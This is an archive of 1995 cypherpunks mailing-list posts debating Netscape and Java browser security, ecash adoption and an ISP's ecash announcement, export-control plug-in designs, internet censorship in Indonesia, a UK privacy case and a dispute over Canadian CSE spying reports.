From: szabo at netcom.com (Nick Szabo)
Date: Fri, 17 Nov 1995 12:51:37 +0800
Subject: Security via Sounding Impressive
Message-ID: <199511170351.TAA26249@netcom5.netcom.com>



I've notice an interesting pattern in how security mechanisms are named.
On the one hand, we have some security features with very impressive sounding
names:

Certification *Authority*
*Authorization*
*Trusted* Server
*Master* Key
etc.

These words fill most people (many on this list are exceptions)
with awe and good will towards the feature so named. They also 
make good channel markers, pointing out the _insecure_ parts 
of the system.  The effect is to cover up the lack or inadequecy 
of a mechanism with invocations that put your brain to sleep. This 
is quite lucrative for marketing purposes, but it works on
many designers of security features as well!

On the other hand, when we isolate the actual mechanisms of a system
are in fact  mathematically secure, we get names like:
 
Encryption
Blinding
Message Digest
Mix
Capability

These are just plain, boring words, with no connotation that we should
trust them like we trust our big brother.  They just work.
 
Nick Szabo					szabo at netcom.com
Internet Commerce & Security consulting -- e-mail for details





From bdolan at use.usit.net  Thu Nov 16 20:55:28 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Fri, 17 Nov 1995 12:55:28 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <v02120d00acd1aa2c9cf1@[205.139.212.66]>
Message-ID: <Pine.SOL.3.91.951116225922.14202B-100000@use.usit.net>


��c~ZX��^���\r��R�



From fc at all.net  Thu Nov 16 21:04:14 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Fri, 17 Nov 1995 13:04:14 +0800
Subject: Java & Netscape security  [NOISE]
In-Reply-To: <9511162021.ZM15853@glacius.alias.com>
Message-ID: <9511170355.AA28616@all.net>


...
> On Nov 16,  7:06pm, Dr. Frederick B. Cohen wrote:
> > 	So your claim is that Unix is perfectly secure for networking,
> > because without inetd, sendmail, ident daemon, HTTP daemons, syslogd,
> > and all those other add-on software pieces, if your users act perfectly
> > and nobody ever makes a mistake, you are safe from known attacks.
> 
> Nope. Claim is roughly along the lines of, unix is incredibly insecure
> for networking, because of inetd, sendmail, ident, httpd ... but *if*
> there's a bug in sendmail, the trouble is not with the poor sod who
> put file access into the kernel, and definitely not with the person
> who wrote pine--even though pine calls sendmail.

But of course, the sendmail problems are all related to other problems with
Unix, and the common thread to all of the sendmail attacks is Unix, so many
people blame Unix, not sendmail (although I think there is enough blame to
go around).

> > [summary of rest: postscript bad]
> 
> As you finally concluded, the problem is the web browser. I concede that
> a web browser is a security hole by its very nature in that it makes it
> a lot easier for anyone to grab anything from anywhere. (This is also
> why web browsers would be unpopular with censors, if censors thought they
> could get anywhere by arguing against web browsers instead of sites.)

Grabbing anything from anywhere isn't the problem.  The problem is how you
interpret it.  Information only has meaning in that it is interpreted.

> Since you've now stated that the web browser is wrong and evil and bad,
> perhaps it's time you explained your fix for the web browser.

I didn't say wrong, evil, or bad.  I only said insecure.  My complaints
against Netscape and Sun are not that their Web browsers are insecure -
it is that they are selling these browsers based on security.  The
general public, and most of the users in the world, don't percieve the
difference between SSL and Java and secure - they hear that SSL makes
them safe, that Java makes them safe, and they believe it. 

> The
> millions of users, even if they *aren't* the problem, even if they *are*
> blameless for blindly accepting anything anyone sends them, even if they
> are faultless to ignore any notes on security or care which come with web
> browsers--despite all of this--will still want something like a web browser.

It's like selling me a gun and calling it safe because it has a safety on it.
The safety doesn't make a gun safe, it only makes it safer against particular
classes of problems.  Gun sellers don't call guns safe, and neither should
sellers of Web browsers.

> Your argument seems to be running to "users are stupid", but it's the
> developer's fault that users are stupid, and the developer should protect
> the user in all cases from their own stupidity.

If the user claims to provide safety, that should apply to the least
knowledgeable user, not only to the most knowledgeable.  Almost any
system can be operated securely by the most knowledgeable user.  That's
not the market Netscape and Java are aimed toward.

> People shouldn't make web browsers, because web browsers, in untrained hands,
> can damage computers.
> People shouldn't make guns, because guns, in untrained hands, can damage
> computers.

I said neither.  I said that people shouldn't claim that Web browsers
are safe just because they have some safety features.  The same applies
to guns. 

> I would say that connectivity is risk, and that those who want connectivity
> must weigh those risks. I think most people weigh the risks of Netscape
> et al. and say, "the benefits offset the risks."

If that were true, I wouldn't have a real problem with it, but it's not
true.  Most people don't understand the risks.  In fact, even most
people on this list apparently don't understand the risks.  People see
benefits because they pop out at them on the screen.  People only see
risks when they get burned by them and are aware of it.

I think that very few people weigh the risks of Netscape/HotJava because
almost nobody is even aware of them.  Of the people that do weigh the
risks, many of them listen to people who say that Netscape/Java is
secure.  Very few of them pay real attention to the details of what is
actually claimed about security.

Then we have the people at Netscape/Sun and many of the people on this
list who keep telling people that these products are secure.  We hear
again and again that they should blame any negative results of using
these products on their users and the copy of ghostscript or postscript
they imported to make their browser read the files they want to read. 

If companies claim a secure browser, it should be secure regardless of
the typical errors and omissions made by the least sophistocated user.

> [web browsers don't destroy hard drives, numbskulls with mice do]

Current Web browsers are unsafe - so are most current users.  Bullets
kill people, but for the most part, people pull the triggers, and a gun
is the enabling technology.  When you hand millions of people who know
nothing about guns with loaded oozies and put them into crowds, you can
hardly claim no responsibility when they start shooting each other. 

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From frantz at netcom.com  Thu Nov 16 21:06:55 1995
From: frantz at netcom.com (Bill Frantz)
Date: Fri, 17 Nov 1995 13:06:55 +0800
Subject: Java & Netscape security (reply to misc. postings)
Message-ID: <199511170439.UAA19926@netcom17.netcom.com>


After reading http://java.sun.com/1.0alpha3/doc/security/security.html my
(possibly faulty) understanding of Java security is that it will not allow
an applet to speak to IP addresses other than the one it was loaded from. 
I have a question:

Doesn't restriction this prevent an applet from checking some ecash it has
just received for validity with a bank computer?

Thanks - Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz at netcom.com             Los Gatos, CA 95032, USA







From rah at shipwright.com  Thu Nov 16 21:11:28 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 17 Nov 1995 13:11:28 +0800
Subject: e$: Mandarins, Lifers, and Talents
Message-ID: <v02120d0eacd1b471dc1d@[199.0.65.105]>


>It really did not happen because of cheerleaders. This is a recurring
>belief of mine, notably in my occasional interactions with the nanotech
>community, as a few members of this list can attest to. The "Rah, Rah"s--no
>pun intended--play a minor role in adoption of new products and
>technologies.

Tim, you can't tell me that there weren't people who were just plain fired
up about the prospects for any really serious technology. Where are you
living, the Gernsbeck Continuum? Tim, those "cheerleaders" are the ones who
either get fired up to do something themselves, or if they can't, they get
people either fired up to buy stuff, or fired up to build stuff. Howard
Hughes was one. Hell, the Wright brothers were. So are you, Tim, only your
passion is strong crypto and cryptoanarchy. Mine is this geodesic market
stuff...


>One argument I am never persuaded by is the hackerish "Feh." (Does anybody
>but hackers use this strange word?)

Ah. Well, Tim, "Feh" is yiddish, actually. Just like "hacker" comes from
electric trains. If you don't believe me on *that* one, ask Mr. Levy, who
knows all about the MIT Model Railroading Club...

>In any case, I'm not interested in "doing better than that." My support for
>Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic
>Money, or E-Purse, of Digibux, or whatever, well, I'm not a merchant. Just
>as one could study flight, to use Bob's example, without operating a
>passenger service or a flying school, so one can be interested in digital
>cash without "opening an account."

Right on, Tim. Just don't rain on my parade, or anyone else who's trying to
make something happen, for that matter.


>Ah, but I never claimed otherwise (perhaps this is what you mean by "your
>nonexistant point"). My point was only that digital cash will happen mostly
>when it fills a need, or is accepted by customers, not by cheerleading and
>by urging people on this list to be pioneers.

Cart before the horse, Tim. Most of the new people (say, for 2 years at
least) on this list *are* pioneers. I've got 600 people over on www-buyinfo
who are there primarily because 90% (!) of the traffic on it is my
e$-filtered cross-posts from cypherpunks, and I don't know how many are
over here because they like their whiskey neat. Those people are so fired
up, they will find a need, or *create* one, if they have to.

>The theories about mandarins, lifers, and talents I'll discuss at another
>time, maybe. All I'll say is that I think it's too simple a categorization.
>Maybe it's a Boston viewpoint.

Damn Yankees. Born in El Paso, myself, by way of St. Thomas, Las Cruces,
Corpus Christi, El Paso, Anchorage, St. Louis, Mid-MO, Chicago, and yes,
Boston. Never knew I was one until you told me...

>The folks I've worked with over the years
>bear almost no resemblance to any of these categories.

Typical Mandarin response. ;-). (just pulling your leg, Tim. Put the Glock
*down*...)

>In any case, people
>will start using digital cash if and when it fulfills some need, or some
>need they never knew they had, gets stimulated.

Agreed.

>
>On a personal note--which is weird, since 1000 or more people may be
>reading this message, though most probably haven't read this far--I think
>it best not to get too emotionally attached to some particular outcome in
>the introduction of a new technology.

I bet they are, but I'm not attached to Mark Twain or even Digicash per se.
It just seems to me, that if you want to get involved in this flying stuff,
here's a plane that flies, even if its elevators are stuck on the front.
Learn to fly now, and be able to fly the new stuff as it becomes available.
If you want to fly, that is. Some people then couldn't help it. They *had*
to do it. That's what's happening here, Tim.

>I've seen many "prophets" wailing to the world that their
>visions _deserve_ success.

Not here Tim. I believe you might be projecting, or something. I just want
to sell stuff for cash on the net. Then, I want to surfact the financial
markets into little tiny pieces...

>The technologies which hit the right chord rarely need, or benefit from,
>the "evangelists" and "cheerleaders." The Macintosh did not Guy Kawasaki or
>any of the other so-called evangelists to succeed. The microprocessor did
>not evangelists. The airplane did not. The VCR did not. The cellular phone
>did not.

I don't believe that for a minute, and on reflection, you probably don't
either. Jerry Sanders at AMD. Hell, Tim, you knew Moore, for god's sake.
Think about, oh, the Sony guy, whatever his name is, Morita. The people who
built the Mac were *possessed*. So was Kawasaki. I'm *still* possessed.
What about the *entrepreneur's* reality distortion field. I bet you've seen
more than a few, and probably more than a few who were right, or you
wouldn't be thrashing your Mac on the net and clipping coupons...


>And I can think immediately of several
>technologies that had active proselytizers--Ted Nelson, Doug Engelbart,
>Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space
                                                                ^^^^^
>enthusiasts--but in which progress has been stalled or proceeded along
^^^^^^^^^^^^
>different paths for different reasons.

I resemble that remark. Sure, Tim some of them didn't make it. But for
every one of those (strange you should mention Jobs, right after I mention
the reality distortion field, and don't count him out yet, rumor has it
Ellison wants him to run Apple when Oracle buys it, god help us all), there
are others who did exactly that. Von Braun, or Porsche, or, hell, all I can
think of are germans, uh, okay, Bill Gates.

>This is a very interesting area for me, and I used to write extensively
>about it. Nick Szabo and I had several debates about this, a couple of
>years ago. However, no time now to discuss the full implications here.

Having been hammered by Nick myself, once or twice, I think I understand this...

So. I'm enthused. My enthusiasm is demonstrably contagious. If someone gets
enthusiastic about all this on my account, and puts up the king-hell,
world-beater, financial-cryptography-killer-ap that's cool by me.
Otherwise, it's only bandwidth, which I've wasted enough on for this
thread. If you want to make the rubble bounce, go for it.

Besides, I usually stay in my cage, these days. Which is where I'm going to
go and lurk for another month or so...

Cheers,
Bob Hettinga

PS: Feh

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From tcmay at got.net  Thu Nov 16 23:06:16 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 15:06:16 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <acd16c9506021004ccb3@[205.199.118.202]>


At 5:20 AM 11/17/95, sameer wrote:
>>
>> 3. The success of BankAmericard (later renamed Visa) came when real
>> customers and real shops started to use it, not when early pioneers set
>> themselves up as clearinghouses and whatnot.
>
>        I'm sorry, but Community ConneXion is a real shop, with real
>customers, selling real services, and we accept ecash.

You guys are getting way too sensitive about all this.

I'm in favor of real shops selling real things or real services. My point
was that there is no compelling need to get people to sign up just for
moral support.

Lighten up.

--Tim


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From stewarts at ix.netcom.com  Thu Nov 16 23:23:26 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 17 Nov 1995 15:23:26 +0800
Subject: Mark Twain Bank ecash scripts needed
Message-ID: <199511170707.XAA07527@ix3.ix.netcom.com>


At 04:25 PM 11/16/95 -0700, Bryce wrote:
>I am in the process of setting up a shop using Mark Twain Bank
>Ecash.  Could someone please forward me the scripts to accept Ecash
>(running on SunOS.  On c2.org actually) and/or any advice you have

http://www.digicash.nl/mt/
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From perry at piermont.com  Thu Nov 16 23:33:14 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 17 Nov 1995 15:33:14 +0800
Subject: Netscape rewards are an insult
In-Reply-To: <30AAA306.64CF@netscape.com>
Message-ID: <199511160333.WAA08987@jekyll.piermont.com>



Jeff Weinstein writes:
> All of these security measures are implemented by Netscape in the
> current release.  Specifically, Netscape Navigator 2.0beta2
> includes all the applet security precautions detailed in the recent
> comp.lang.java posting.  Netscape has been shipping the fixed
> applet security model for over a month(since 2.0Beta1), and
> Netscape and Sun continue to cooperate and work closely on applet
> security issues.

I've got to note just one thing -- every Netscape 2.0beta2 I've used
has been so full of bugs, and so prone to problems, that I have my
wonders about what the security code looks like. I know, Jeff, that
its all done by different groups -- but the Java stuff I've run in
2.0beta2 is so weirdly different than the supposedly compatible stuff
I've run under HotJava -- especially when it comes to crashing (and it
HAS crashed on me) that I have serious worries about the security of
the thing. I'd say the quality looks very much like an alpha release,
not "beta". I don't want to turn this to Javapunks so I won't say more
on this topic any time soon -- its already been beaten into the
ground.

Perry





From rah at shipwright.com  Fri Nov 17 00:03:02 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 17 Nov 1995 16:03:02 +0800
Subject: e$: Financial Cryptography for Dogs, pt. 2.  OpenDoc Kitchen, anyone?
Message-ID: <v02120d03accfcdbea466@[199.0.65.105]>




As a result of my temporary notoriety as OpenDoc Futurist(tm) ;-), I've
heard about something called an OpenDoc Kitchen, which is a periodic hack
fest put on by Apple for developers of OpenDoc parts where code is actually
written.

My understanding is that this will be held at Apple, in Cupertino, in early
December.

They are especially interested in anyone from Digicash who would like to
make a digital cash OpenDoc component for Cyberdog, because I've been
ranting to them about this picture in my head of someone dragging digital
cash icons onto a register icon in a web browser to pay for a purchase.  I
expect that *any* digital cash part, even some kind of bashing of the
current Mac ecash client into an OpenDoc part, would be cool by them as a
first start.

In addition, it seems to me that we may be close enough with MacPGP 3.0 to
play with it at the component level, but maybe not...


If you're interested, e-mail me, and I'll put you in touch with the right
people.  Now, the invitations have already been sent and RSVP'd on this, so
we'd be coming in through the back door. Obviously, we're looking to put
the best foot forward, as they are just about to the point of believing my
mantra of "digital commerce *is* financial cryptography".

I'm hoping to go, if there's something to do. I couldn't code my way out of
a paper bag, but like the immortal Chauncey Gardener, "I like to watch."
;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From jsw at netscape.com  Fri Nov 17 01:17:12 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Fri, 17 Nov 1995 17:17:12 +0800
Subject: Netscape rewards are an insult
In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com>
Message-ID: <30AC4F87.7BDB@netscape.com>


Matthew James Sheppard wrote:
> I've got to note just one thing -- what about the Netscape LiveScript
> language?  is it opening up the same security can of worms as java?  I
> realise that it provides functionality specific to browsing only (no
> network/files) but the potential for bugs when you add another
> language must increase.

  One advantage that livescript has is that it was designed and
implemented by one individual, removing communication problems
as a possible source of holes.

  We are reviewing the set of reflected objects for possible security
problems, and will be taking a conservative approach to what we
include.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From don at cs.byu.edu  Fri Nov 17 02:01:29 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Fri, 17 Nov 1995 18:01:29 +0800
Subject: Ecash account
Message-ID: <199511170930.CAA00682@wero.byu.edu>


So who here is going to use their ecash account to set up a money
lau^H^H^Hexchange service?
 
Ob Cyphernoise: Would Dr Fred, Alice, and any other names LD has set up
for himself lately please keep the noise limited to email? Please?
 
Ob Plonk: amen. So let it be written, so let it be plonked.
 
Don





From gimonca at mirage.skypoint.com  Fri Nov 17 18:40:08 1995
From: gimonca at mirage.skypoint.com (Charles Gimon)
Date: Fri, 17 Nov 95 18:40:08 PST
Subject: No Privacy Right in Indonesia ? (fwd)
Message-ID: <m0tGdBP-0005JZC@skypoint.com>



I spent several minutes resisting a followup, but if people are going to
discuss, I have to cave...

Forwarded message:
> 
> At 05:54 PM 11/17/95 -0500, "James M. Cobb" <jcobb at ahcbsd1.ovnet.com> wrote:

> >   Activists in Indonesia who use the Internet say it is a power- 
> >   ful tool for distributing information in a society where self- 
> >   censorship abounds, newspapers are tightly controlled, jour- 
> >   nalists are jailed and unlicensed magazines banned. 
> 
> The primary difference between Indonesian and Singaporean censorship
> is that the Singaporeans are a lot more urbane about it, and generally
> don't have crowds of protestors to shoot at.  Reporting on the East Timor
> activity is an especially good way to get kicked out of the country;
> I know people it's happened to.  Uncensorable communications can be
> a substantial help, though rubber-hose cryptanalysis is still fairly
> effective, and it's the type of place that would use it.
> 
> A certain amount of US activism on the East Timor problems is Internet-based;
> I don't know how connected it is to Indonesia or East Timor, which is
> too underdeveloped to be very active on the net, and has the added problem
> that activists are heavily watched.

I'll try to keep this as short as possible...

Almost anything on the Internet about East Timor is just crap. Get that out
of the way first. I've put the entire Portugal domain in my kill file. It's
like reading the lowest grade of anti-abortion rant from an AOLer.

The issue under all the others is "what happens when Suharto dies". 
Lots of people, both in and out of power, are biding their time until
Suharto leaves power.

My hunch is that practically nobody in Indonesia has a PC at home like
most US Internet users do. They're getting access through a company or
university, or through a government office. A distributed network can
resist censorship--but Indonesia isn't very distributed yet, and almost
everyone is dependent on some sort of institutional access. Most people
in Indonesia--including a lot of middle-class people--don't have a phone.
You run down the street to a government Telkom office or a private 
Wartel office to make a phone call. Putting Web terminals in Wartels--
now *that would be a concept.

If you dig into the UUCP maps for Java, you'll see a surprising number
of sites listed in all sorts of little places. How many of those are
up and operating, I have no idea. You are routinely warned that people
at those sites are generally charged for receiving foreign e-mail, and
that that can be expensive for them at current exchange rates.

Private Internet providers (RadNet, IDOLA, IndoNet) have popped up
only in the last year or so. I have links to some from my home page
(http://www.skypoint.com/members/gimonca)

As for the rubber hose...Indonesia is a fairly inscrutable country to
try to figure out. They are quite capable of simply killing people if
necessary; at other times, the wheels of justice turn agonizingly slow,
and people are left free for the moment not knowing what might end up
happening (a la Phil Zimmerman). My at-a-distance impression is that
you see more of the Alabama-Sheriff's-Deputy kind of oppression than 
the Nazi-jackboot kind. Either way, it's millions of light years from
the Libertarian Home World.

Technology is a hot issue in Indonesia, partly because one of Suharto's
favorite ministers, Mr. Habibie, is kind of a techno-nut, and has been
pushing a variety of medium- and high-tech projects for Indonesia. Some
people feel that he's being allowed to do whatever he wants, regardless
as to whether his projects make any economic sense or not. After Suharto
is gone, it will be interesting to see how high-tech stuff fares. In
short, will Habibie end up giving it a bad name? Or will the technological
middle class come to power and do it right the second time around?

I'm going to stop rambling, and add something of more crypto-relevance.
I've got an old article of mine about remailers in my web pages.
(http://www.skypoint.com/members/gimonca/anonmail.html) I've talked it
up in soc.culture.indonesia and soc.culture.malaysia. Later, sameer
asked me to put a link to c2.org in there. Now, I'm getting a low but
respectable number of hits on that page (30-40 per day)...so it's not
out of the question that some of those Indonesian users might be 
finding their way to sameer's site for a badly-needed nym.






From stewarts at ix.netcom.com  Fri Nov 17 02:46:12 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 17 Nov 1995 18:46:12 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511170734.XAA12528@ix3.ix.netcom.com>


At 03:13 PM 11/16/95 -0600, Scott Brickner wrote:
>The problem is that the non-encryption program must use the same
>interface as the encryption program.  Text compression is often cited
....
>You'd need a program which not only *accepted* the additional parameter,
>but also *needed* the second parameter.  I confess I have some difficulty
>thinking of one.

If you support user-specified program/module interface which take
arbitrary string-valued arguments (e.g. Unix-style stuff or objects),
and you've got negotiation methods that can accept args,
then you've got a very general system which they shouldn't
be able to argue with - so the drop-in authors can hand the keys around
as 0xHEX-strings rather than bignums without the program needing to know.
Sorting and backup systems often want lots of options.

If you decide for reliability reasons to insist on registered module names,
to prevent problems like six different sorting modules with different
argument orders, or backup modules with different ideas of "original" and "copy"
(switching those two can be _Very_ annoying!), then there's even a mechanism
which the crafty foreigner to distribute modules and documentation!

>> An abstract set of open/modify/close
>> routines (where open returned a pointer to opaque state, say a session
>> key :) would be fine.

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From sameer at c2.org  Fri Nov 17 02:46:16 1995
From: sameer at c2.org (sameer)
Date: Fri, 17 Nov 1995 18:46:16 +0800
Subject: COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH
Message-ID: <199511170805.AAA10143@infinity.c2.org>


For Immediate Release - November 17, 1995
Contact: Sameer Parekh sameer at c2.org 510-601-9777

COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH

Community ConneXion today announced that it has become the first and
only Internet Service Provider in the world to allow for payment using
ecash, a digital cash system developed by DigiCash bv, of Amsterdam,
Holland, released jointly with Mark Twain Bank, of St. Louis,
Missouri.

On October 23rd, DigiCash bv announced jointly with Mark Twain Bank
that they would be issuing ecash denominated in real U.S. Dollars. In
the past DigiCash had been running a trial "CyberBucks" payment
system, which was not backed by any strong currency; it was a form of
"Monopoly Money". 

The ecash system provides full payor anonymity. Consumers can use
ecash tokens to pay for goods on the Internet, with full anonymity
from the merchants. This lets consumers buy things without fear of
merchants compiling and selling databases of their spending habits. It
also allows for a convenient and safe mechanism for payment through
the Internet.

Sameer Parekh, President of Community ConneXion, said that ecash is a
significant improvement over the payment systems widely in use on the
net today. He described one example, "Currently people usually just
send their credit card numbers over the net to the merchant if they
want to buy something. This opens up the security risk of having the
merchant's computers broken into; every consumer's full credit limits
are then subject to attack. With ecash, only the limited sums that
have been spent are at risk."

Community ConneXion has begun accepting ecash as payment for its
services, offering a five percent discount for customers who pay with
ecash. "It simplifies our accounting and protects the privacy of our
clients; it is to everyone's benefit to use ecash," said Parekh.
"Ecash has greatly simplified account creation procedures for our
anonymous accounts. In the past someone creating an anonymous account
would need to wait until their payment arrived, and their check
cleared, before the account could be created; now, the account is
created automatically, immediately after the ecash payment is made
over the world-wide-web."

Community ConneXion is the leading provider of privacy on the
Internet. They provide anonymous and pseudonymous internet access and
web pages in addition to powerful web service, virtual hosts, and web
design consultation. Information is available from their web pages at
http://www.c2.org/. Information about the Mark Twain Bank ecash
release is available from http://www.marktwain.com/ecash.html.

DigiCash, CyberBucks, and ecash are trademarks of DigiCash bv. Mark
Twain Bank is a trademark of Mark Twain Bancshares. Monopoly is a
trademark of Parker Brothers, Division of Tonka Corporation.





From jcobb at ahcbsd1.ovnet.com  Fri Nov 17 02:46:51 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Fri, 17 Nov 1995 18:46:51 +0800
Subject: No Privacy Right in UK ?
Message-ID: <Pine.BSD.3.91.951117025209.5772G-100000@ahcbsd1.ovnet.com>


 
 
 
                      Cypherpunks assume privacy is a good thing 
                      and wish there were more of it. 
 
                                        --Welcome to cypherpunks 
 
 
 
Friend, 
 
 
11 16 95 The Electronic Telegraph runs a newsstory headed 
 
   Doorstep polish researcher was whiplash injuries spy 
 
 
Here are excerpts from the newsstory: 
 
   Miss [Natalie] Goldner had been hurt when a car in which 
   she was a passenger was hit from behind in April 1988, 
   and she was forced to leave her video library job. 
 
   Shortly after the accident, she started a claim for compen- 
   sation and future loss of earnings against the Royal Insur- 
   ance Company. 
 
   ...Margot Christie...was working for the Hampshire Detec- 
   tive Agency when she went to Miss Goldner's house in Octo- 
   ber 1991. 
 
Christie posed as a market researcher. 
 
   It was only when a compensation claim reached court that 
   Miss Goldner realised the "researcher" was a private de- 
   tective hired to discover the extent of her injuries. 

   In a report which was due to go before the court, Mrs Chris- 
   tie said she had asked Miss Goldner to test some polish 
   and window cleaner. 
   
   [Christie] returned 11 days later.  "I asked the plaintiff 
   if the polish had given a good shine and if she had rubbed 
   hard. The plaintiff said 'Yes I did, it didn't smear at all'." 
 
Natalie lives with her mother. 
 
   "I felt as though we had been burgled.  I felt violated.  We 
   were so worried afterwards that we just didn't trust anyone 
   who turned up at our door. 
 
   "She asked lots of questions about who did the housework 
   in our house.  We were just chatting away and I had no idea 
   she was there to spy on me." 
 
Natalie settled out of court. 
 
   In September, she accepted a 20,000 [pound] settlement after 
   one day of a planned four-day court hearing. 
 
   She is to lodge a complaint with the Association of British 
   Investigators.... 
 
Fortunately, the Daily Telegraph publicized the case.  The news- 
story points out: 
 
   A spokesman for Liberty, the civil rights group, said:  "There 
   is no right to personal privacy in Britain and so it [invasion 
   of privacy by deception] is not against the law." 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The Electronic Telegraph can be accessed at 
 
                 http://www.telegraph.co.uk 
 
 
       The online filename of the above newsstory is: 
 
                        nspys16.html 
 
 







From anonymous-remailer at shell.portal.com  Fri Nov 17 19:01:53 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 17 Nov 95 19:01:53 PST
Subject: CSE gets flak on TV
Message-ID: <199511180300.TAA16642@jobe.shell.portal.com>


Alice here (the real one) ...

On Thu, 16 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> Hmm, actually the news tape is reading a little strange here in Canada.
> Not AP, or REUTERS, but simply the Canadian Press newswire.

         [long exercise in character assassination deleted]

I think that this "writer" who felt that it was desirable to attach MY
name to this drivel deserves a good flogging. 

Clearly, someone is spending WAY to much time on //WIRES on the Dow Jones
News Retrieval Service, or wherever else they get to Canadian Press news
stories.  The matter Mr. mystery-writer detailed is in fact a Canadian
matter, a domestic affair, which has no concern to an international
audience. 

Taking three successive news stories from three days ... (press stories,
I've since pulled for my own reference) and pasting them together to
indicate some type of Machiaevellian?? (sp) exercise is simply "not done." 

> And all these stories ... coincidentally ... broke back to back.
> 
> It's almost as though the country is disinfecting itself, or has taken 
> one particularly powerful laxative.

I don't see this at all.  The CSE story has no connection to anything 
else which is occurring domestically nor internationally.  No relationship 
whatsoever.

> But the CSE story is really, really smelly.  The worst of the whole lot. 
> 
> I think that there might be more to this than appears on the surface. 
> Maybe filling in some details might help our friends on this list.
> 
> You listening, Perry???

I think Perry has far more interesting fish to fry, than to worry about 
domestic Canadian affairs, and what occurs within another sovereign's 
borders.  

Whether or not Canada has collected and analyzed communications traffic on
the activities of foreign states, corporations, and people is simply a
Canadian matter.  

It's OUR affair.

> "And if, in fact, there has been illegal activity going on, we'll want to 
> deal with that in as public a way as possible," said Sheila Copps.
> 
> The Mexican government has presented a diplomatic note to Canada
> expressing "surprise and concern" over the report that it was spied on
> during the North American free-trade talks. 
> 
> South Korea is looking into the matter as well. 

Airing dirty laundry like this serves no purpose, whatsoever.  It's not
productive and is not focused to any particular policy objective. 

And in n any event, the Canadian Communications Security Establishment
does serve up "sloppy seconds" (as some other poster named them) under
intelligence sharing agreements with its counterparts in the United
States, Britain, Australia, and New Zealand.  

In the same vein, it also is a recipient of same.  These agreements and
working relationships have historically benefitted all. 

> And I guess ... that's all of the news that I've got to this hour.  Except
> for one brief note, that Prime Minister Chretien tried to call the States,
> but the Government shutdown meant that his call couldn't get through.  
> I think he tried to call NASA.

Fella ... whoever you are ... please get your stories straight.

The Prime Minister of Canada was trying to call NASA, not the NSA.  There IS 
a significant difference between the two, as near anyone on this list can 
attest.

The Prime Minister was attempting to contact Canadian astronaut Chris
Hadfield, who is on the space shuttle Atlantis which is presently docked
with the Russian space station Mir.  

He wasn't trying to call the NSA ...  it was the NASA. 

In fact, the Prime Minister's comments from the Commonwealth meeting in
New Zealand were most clear.  "This is an organization that works within
the law of Canada.  They do not report to me on a daily basis and I cannot
make any comments on if they are spying on anybody, I don't know.  But
they have a mandate to check a few things around the world." 

Please try reading the list for a bit, before posting and confusing
people. 

> Speaking personally, I just think that something is a bit fishy. I mean 
> "Jane Shorten" is a nym if I ever heard one ... probably married to
> "Dick Lengthen" or something.  

Your juvenile antics deserve no further comment.

> I mean ... HELLO .... GiGGle TesT ... what on earth did she think the CSE 
> did??  Made snowmen and skated on the Rideau Canal??

I don't think that this is relevant.

And btw, it's giggle test ... it's not "GiGGle TesT".  I learned how to 
use a shift key long, long ago.  You oughta try it some time.

> The agency IS obligated to destroy information about Canadians it scoops 
> up in its electronic net.  A rare exception might be a phone call 
> describing a terrorist plot, but that would truly be exceptional, I think.
> 
> I mean its not like one big fishing expedition. 

The CSE does not target its own citizens and has agreements with other 
agencies that they will not either.  If someone's communication is 
accidentally caught in the net, the CSE is obligated to destroy the 
information except in the rarest of circumstances. (i.e. foreign terrorists)

> And that's the fleshed out version of the story.

Your fleshed out story was very interesting ... especially the way you 
tied things together.  Did they teach you to do that type of thing 
somewhere??

